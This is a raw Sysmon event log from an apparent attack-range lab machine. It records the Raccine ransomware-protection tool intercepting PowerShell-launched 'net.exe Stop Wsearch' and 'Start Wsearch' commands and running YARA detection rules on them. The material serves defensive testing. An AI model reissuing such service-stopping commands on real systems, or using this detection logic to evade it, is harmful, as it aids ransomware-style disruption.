Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258552Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.246{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258550Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.241{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258535Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.232{9DBE88B5-5873-61B2-9E09-010000000E02}70004340C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002258468Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.189{9DBE88B5-C32E-61A8-0C00-000000000E02}8486480C:\Windows\system32\svchost.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258467Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.187{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-D409-010000000E02}5476C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002258466Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.185{9DBE88B5-587A-61B2-D309-010000000E02}3196ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac4B5D.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002258465Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.179{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-D409-010000000E02}5476C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258459Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.178{9DBE88B5-587A-61B2-D309-010000000E02}31966376C:\Program Files\Raccine\Raccine.exe{9DBE88B5-587A-61B2-D409-010000000E02}5476C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258458Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.178{9DBE88B5-587A-61B2-D409-010000000E02}5476C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" Start WsearchC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start Wsearch 10341000x80000000000000002258457Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.170{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258452Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.168{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258451Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.168{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002258450Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.167{9DBE88B5-587A-61B2-D309-010000000E02}3196C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Start WsearchC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002258439Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:50.141{9DBE88B5-5878-61B2-B809-010000000E02}6160ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmpMD5=81F9601E3C5B8DB1A73307642B20A3EA,SHA256=6B7B5FA27F691C9C3E00685A9A6A2CEBEF55FB586E5C73427B288F14E873D9E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002258422Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.790{9DBE88B5-5878-61B2-D009-010000000E02}60606448C:\Program Files\Raccine\yara64.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\yara64.exe+8503f|C:\Program Files\Raccine\yara64.exe+7ce90|C:\Program Files\Raccine\yara64.exe+73b07|C:\Program Files\Raccine\yara64.exe+7303c|C:\Program Files\Raccine\yara64.exe+17c129|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258419Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.777{9DBE88B5-5878-61B2-D109-010000000E02}79002128C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-D009-010000000E02}6060C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258412Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.765{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-D009-010000000E02}6060C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258411Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.765{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-D009-010000000E02}6060C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+116f5|C:\Program Files\Raccine\Raccine.exe+6156|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258410Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.765{9DBE88B5-5878-61B2-D009-010000000E02}6060C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\in-memory\gen_loaders.yar" 6776 -d MemoryScan=1 -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258407Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.749{9DBE88B5-5878-61B2-CF09-010000000E02}66047840C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-CE09-010000000E02}4512C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258401Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.738{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-CE09-010000000E02}4512C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258400Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.737{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-CE09-010000000E02}4512C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258399Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.737{9DBE88B5-5878-61B2-CE09-010000000E02}4512C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ryuk-commandlines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258396Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.722{9DBE88B5-5878-61B2-CD09-010000000E02}56005300C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-CC09-010000000E02}4976C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258390Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.711{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-CC09-010000000E02}4976C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258389Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.711{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-CC09-010000000E02}4976C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258388Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.711{9DBE88B5-5878-61B2-CC09-010000000E02}4976C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\powershell_loaders.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' Stop Wsearch" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5878-61B2-B809-010000000E02}6160C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" Stop Wsearch 10341000x80000000000000002258385Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.696{9DBE88B5-5878-61B2-CB09-010000000E02}80007448C:\Windows\system32\conhost.exe{9DBE88B5-5878-61B2-CA09-010000000E02}4504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258379Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.684{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5878-61B2-CA09-010000000E02}4504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002258378Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.683{9DBE88B5-5878-61B2-B809-010000000E02}61607360C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5878-61B2-CA09-010000000E02}4504C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002258377Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:26:48.684{9DBE88B5-5878-61B2-CA09-010000000E02}4504C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\other_0xa9five_poc.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac43FA.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" 